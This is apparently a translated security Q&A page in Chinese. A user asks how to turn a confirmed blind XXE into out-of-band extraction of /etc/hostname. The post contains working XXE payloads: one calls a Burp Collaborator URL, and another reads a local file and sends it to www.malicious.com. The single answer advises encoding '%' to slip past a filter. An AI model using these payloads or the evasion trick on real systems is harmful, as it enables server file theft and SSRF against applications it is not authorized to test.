首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >带OOB数据抽取的XXE

带OOB数据抽取的XXE
EN

Security用户
提问于 2020-10-01 14:20:27
回答 1查看 1.1K关注 0票数 1

场景:

我成功地向burp协作者发送了一个请求,然后应用程序就会通过盲目的XXE容易受到SSRF的攻击。我使用的有效载荷如下

代码语言:javascript
复制
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>&xxe;</xxx>

如果我像这样使用XML实体(% xxe)

代码语言:javascript
复制
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE % xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>%xxe;</xxx>

载荷不起作用。因此,我假设XML参数实体或%符号被过滤了。

目标:

作为下一步,我想从web应用程序中提取/etc/hostname。我发现的有效载荷如下:

代码语言:javascript
复制
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/hostname" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>

....which使用XML参数实体(%)。如何修改有效负载以避免使用%。删除%是否足以具有语法正确的有效负载?

EN

回答 1

Security用户

发布于 2021-02-12 13:12:27

这在很大程度上取决于应用程序的XML解析器。但是,尝试使用%编码%

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/239072

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档